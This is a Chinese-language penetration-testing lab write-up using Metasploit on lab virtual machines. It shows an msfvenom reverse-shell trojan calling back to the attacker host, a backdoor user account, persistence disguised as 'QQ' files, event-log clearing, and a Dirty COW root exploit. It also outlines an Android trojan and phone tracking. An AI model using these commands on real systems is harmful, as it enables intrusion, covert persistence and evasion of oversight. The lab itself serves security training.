1.实验 Metasploit

2、实验环境

本实验需准备:

1)Kali虚拟机
2)Windows虚拟机
3)Centos/Ubuntu虚拟机

3、实验需求

1)将渗透主机KALI,Windows与Metasploitable2的网卡连接模式设置为NAT模式

Kali:在这里插入图片描述

Windows7:在这里插入图片描述

metasploitable2:
在这里插入图片描述

2)使用metaspoit连接postgresql,并使用合适的方法探测内网主机存活。

└─# systemctl start postgresql
在这里插入图片描述

msf6 > db_nmap 192.168.230.0/24
msf6 > hosts
在这里插入图片描述

3)使用合适的方式探测主机系统和端口

msf6 > db_nmap -sV -O -T4 192.168.128.128-132
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4)根据已知信息渗透内网的Metasploitable2与windows主机

5)使用合适的方式渗透Windows主机,进行提权,创建用户Yucedu,密码为huawei@123456并留下持久化后门。

1.生成木马 && 开启监听
─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.230.132 lport=5555 -f exe >wshell.exe 复制到浏览器目录
在这里插入图片描述

2.systemctl status apache2
在这里插入图片描述

3.window7访问kali ip地址并下载wshell.exe
在这里插入图片描述

4.设置监听模块
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5.提权:
在这里插入图片描述

6.创建用户
meterpreter > shell
C:\Windows\system32>chcp 65001
C:\Windows\system32>net user Yucedu huawei@123456 /add

在这里插入图片描述
在这里插入图片描述

7.留下可持续化后门
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > set delay 5
msf6 exploit(windows/local/persistence) > set session 1

msf6 exploit(windows/local/persistence) > set VBS_NAME QQ.vbs
msf6 exploit(windows/local/persistence) > set REG_NAME QQ_GAME.reg
msf6 exploit(windows/local/persistence) > set lport 6666
msf6 exploit(windows/local/persistence) > run -j

在这里插入图片描述
在这里插入图片描述
8.查看window 7 注册表&& 生成的文件和任务管理
在这里插入图片描述
在这里插入图片描述

结束进程session 变成7
在这里插入图片描述

9.msf6 > handler -H 192.168.230.132 -P 6666 -p windows/meterpreter/reverse_tcp
#持久化监听
在这里插入图片描述
在这里插入图片描述

重启系统可过了5s看到又反弹了一个shell
在这里插入图片描述

6)清除windows渗透痕迹,根据Metasploitable2开放的端口和当前版本,进行信息搜集。

meterpreter > clearev
在这里插入图片描述

Metasploitable2:
msf6 > db_nmap -sV -O -T4 192.168.128.131
在这里插入图片描述

7)使用脏牛漏洞攻击主机Metasploitable2,并留下后门。

利用代码网址:https://github.com/FireFart/dirtycow/edit/master/dirty.c
1.复制网址的利用代码到kali 创建dirty.c 文件
在这里插入图片描述

靶机通过访问kali的http服务下载下来
在这里插入图片描述

2.编译成dirty
在这里插入图片描述

3.赋予可执行权限,密码为123
在这里插入图片描述

4.登入firefart 账号查看(就是root用户)
在这里插入图片描述

5.最后将其恢复:mv /tmp/passwd.bak /etc/passwd
在这里插入图片描述

8)将KALI的网卡切换的桥接模式。将手机与物理机连接到同一个WIFI中,使其属于同一网段。

在这里插入图片描述

9)使用合适的方式制作木马,下放给安卓系统手机并进行连接。

在这里插入图片描述

10)使用合适的命令和工具定位手机位置。

在这里插入图片描述

因为手机原因无法完成这个实验
在这里插入图片描述

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐